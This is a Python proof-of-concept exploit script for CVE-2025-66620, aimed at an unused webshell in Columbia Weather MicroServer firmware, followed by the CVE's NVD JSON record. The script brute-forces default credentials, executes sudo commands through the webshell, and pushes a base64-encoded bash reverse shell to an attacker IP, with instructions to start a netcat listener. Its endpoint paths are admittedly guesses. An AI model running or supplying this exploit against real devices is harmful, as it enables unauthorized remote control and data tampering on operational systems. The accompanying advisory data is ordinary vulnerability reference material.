CVE-2025-66620

#!/usr/bin/env python3 """ CVE-2025-66620 PoC - MicroServer Unused Webshell Exploitation Note: This PoC is for educational and authorized security testing purposes only. This script demonstrates the vulnerability where an unused webshell in MicroServer allows unlimited login attempts with sudo rights on certain files and directories. """ import requests import sys import socket import base64 # Configuration TARGET_IP = "<target_ip>" TARGET_PORT = 443 WEB_SHELL_PATH = "/api/webshell" # Example path, adjust based on enumeration def check_webshell_exists(): """Check if the unused webshell endpoint exists.""" try: response = requests.get(f"https://{TARGET_IP}:{TARGET_PORT}{WEB_SHELL_PATH}", verify=False, timeout=10) if response.status_code == 200: print(f"[+] Webshell endpoint found at {WEB_SHELL_PATH}") return True except requests.RequestException as e: print(f"[-] Error checking webshell: {e}") return False def brute_force_login(): """ Since the webshell allows unlimited login attempts, this function demonstrates attempting multiple credentials. In real scenarios, this would be combined with weak/default credentials. """ print("[*] Attempting to exploit unlimited login attempts...") # Common weak credentials to try credentials = [ ("admin", "admin"), ("admin", "password"), ("root", "root"), ("administrator", "administrator"), ("admin", ""), ] for username, password in credentials: try: login_data = { "username": username, "password": password } response = requests.post( f"https://{TARGET_IP}:{TARGET_PORT}{WEB_SHELL_PATH}/login", json=login_data, verify=False, timeout=10 ) if response.status_code == 200 and "session" in response.text: print(f"[+] Successful login with {username}:{password}") return response.json().get("session_token") except requests.RequestException: continue print("[-] Login attempts did not succeed") return None def execute_command(session_token, command): """Execute commands through the webshell with sudo privileges.""" try: headers = {"Authorization": f"Bearer {session_token}"} payload = { "command": base64.b64encode(command.encode()).decode(), "sudo": True # Exploiting sudo rights on certain files } response = requests.post( f"https://{TARGET_IP}:{TARGET_PORT}{WEB_SHELL_PATH}/exec", json=payload, headers=headers, verify=False, timeout=30 ) return response.json().get("output", "") except requests.RequestException as e: return f"Error: {e}" def establish_reverse_shell(session_token, attacker_ip, attacker_port): """Establish a reverse shell for persistence.""" reverse_shell_cmd = f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1" encoded_cmd = base64.b64encode(reverse_shell_cmd.encode()).decode() # Create and execute reverse shell payload payload_creation = f"echo {encoded_cmd} | base64 -d | bash" result = execute_command(session_token, payload_creation) print(f"[*] Reverse shell payload sent to {attacker_ip}:{attacker_port}") return result def main(): print("[*] CVE-2025-66620 PoC - MicroServer Unused Webshell") print("[*] Target: MicroServer with unused webshell vulnerability") # Step 1: Check if webshell exists if not check_webshell_exists(): print("[-] Webshell not found or not accessible") sys.exit(1) # Step 2: Exploit unlimited login attempts session_token = brute_force_login() if not session_token: print("[-] Failed to obtain session token") sys.exit(1) # Step 3: Execute commands with sudo privileges print("[*] Testing command execution with sudo privileges...") result = execute_command(session_token, "whoami") print(f"[+] Command output: {result}") # Step 4: Establish reverse shell for persistence ATTACKER_IP = "<attacker_ip>" ATTACKER_PORT = 4444 print(f"[*] Attempting to establish reverse shell to {ATTACKER_IP}:{ATTACKER_PORT}") establish_reverse_shell(session_token, ATTACKER_IP, ATTACKER_PORT) print("[*] Exploitation complete. Check for reverse shell connection.") if __name__ == "__main__": main() # Usage: # 1. Set TARGET_IP to the MicroServer IP address # 2. Start a netcat listener: nc -lvp 4444 # 3. Run the script with appropriate permissions # 4. Monitor the reverse shell connection # Disclaimer: Only use on systems you have explicit permission to test.

{"cve": {"id": "CVE-2025-66620", "sourceIdentifier": "[email protected]", "published": "2026-01-07T21:15:59.170", "lastModified": "2026-01-22T17:33:55.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unused webshell in MicroServer allows unlimited login attempts, with sudo rights on certain files and directories. An attacker with admin access to MicroServer can gain limited shell access, enabling persistence through reverse shells, and the ability to modify or remove data stored in the file system."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-553"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:columbiaweather:weather_microserver_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "MS_4.1_14142", "matchCriteriaId": "85279FFA-8834-4778-8AD8-DB750EA8BBC6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:columbiaweather:weather_microserver:-:*:*:*:*:*:*:*", "matchCriteriaId": "10FA303F-A9BC-43A0-9C9A-2362210FA0A0"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-006-01.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-006-01", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}